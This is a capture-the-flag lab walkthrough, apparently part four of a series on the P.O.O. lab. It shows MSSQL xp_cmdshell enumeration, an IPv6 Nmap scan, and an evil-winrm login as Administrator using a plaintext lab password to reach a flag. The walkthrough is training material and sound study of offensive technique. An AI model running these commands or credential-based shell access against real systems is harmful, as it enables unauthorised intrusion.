P.O.O — Part 4: Foothold
P.O.O — Part 4: Foothold
Using IIS credentials to move from database access to a system foothold.
💭 Thought Process: “Now that we have the previous flag, let’s continue enumerating the machine to see what else we can discover.”
Local enumeration via the MSSQL shell
Network enumeration
While checking network information on the target, we found several interesting ports open that did not appear in our initial Nmap scan:
SQL (lulz dbo@master)> xp_cmdshell netstat -ano
output
---------------------------------------------------------------------------
NULL
Active Connections
NULL
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 964
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 4948
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:41433 0.0.0.0:0 LISTENING 4292
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 540
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1280
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 692
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1720
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2308
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 692
TCP 0.0.0.0:49673 0.0.0.0:0 LISTENING 684
Interestingly, port 5985 (WinRM) should have appeared in our initial scan but did not.
IPv6 enumeration
We ran ipconfig to inspect network configuration and discovered IPv6 addresses that we hadn’t scanned
SQL (lulz dbo@master)> xp_cmdshell ipconfig
output
---------------------------------------------------------------------
NULL
Windows IP Configuration
NULL
Ethernet adapter Ethernet0 2:
NULL
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::1001
IPv6 Address. . . . . . . . . . . : dead:beef::a86d:e75a:e883:d9ab
Link-local IPv6 Address . . . . . : fe80::9e3a:ab30:8dde:10b%8
IPv4 Address. . . . . . . . . . . : 10.13.38.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:fe94:1921%8
10.13.38.2
NULL
Ethernet adapter Ethernet1 2:
NULL
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.20.128.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Because we initially scanned only IPv4, we ran an Nmap scan against the IPv6 address and the WinRM port to confirm reachability:
1
2
3
4
5
6
7
nmap -Pn -6 dead:beef::a86d:e75a:e883:d9ab -p5985
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for dead:beef::a86d:e75a:e883:d9ab
Host is up.
PORT STATE SERVICE
5985/tcp filtered wsman
Local shell as Administrator (WinRM)
We attempted to connect over WinRM using evil-winrm. Using the IPv6 address in the evil-winrm command initially caused a URI parsing error.
1
2
3
4
5
6
7
8
9
10
11
12
13
evil-winrm -i dead:beef::85c0:c939:afde:2943 -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::85c0:c939:afde:2943:5985/wsman"
Error: Exiting with code 1
After adding the address to the /etc/hosts file.
1
2
# Add this to your hosts file.
dead:beef::1001 poo
1
2
3
4
5
6
7
8
9
10
evil-winrm -i poo -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
We now have a foothold as Administrator. We can find the flag on the Administrator’s desktop.
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/26/2018 5:29 PM 37 flag.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff.....}
This completes the Foothold phase of P.O.O. In the next post, we’ll take this Administrator shell and push for Domain Admin, pivoting through credential harvesting, Kerberoasting, and AD abuse paths.
What did we achieve ?
- Discovered additional listening services via
xp_cmdshell netstat -ano. - Identified IPv6 addresses and scanned IPv6 services.
- Overcame an IPv6/URI limitation by adding a hosts entry and connecting via
evil-winrm. - Obtained an Administrator shell via WinRM.
Key Learnings & Tips (Foothold Phase)
- Check both IPv4 and IPv6 during local enumeration — services can be exposed only on IPv6.
- If a tool rejects IPv6 literals, a hosts entry is a pragmatic workaround.
- Use
xp_cmdshellfor quick local enumeration, but prefer WinRM for interactive Administrator access where possible. - Inspect typical user locations (Desktop, Documents) immediately after gaining Administrator privileges — flags and secrets frequently live there.
Stay tuned…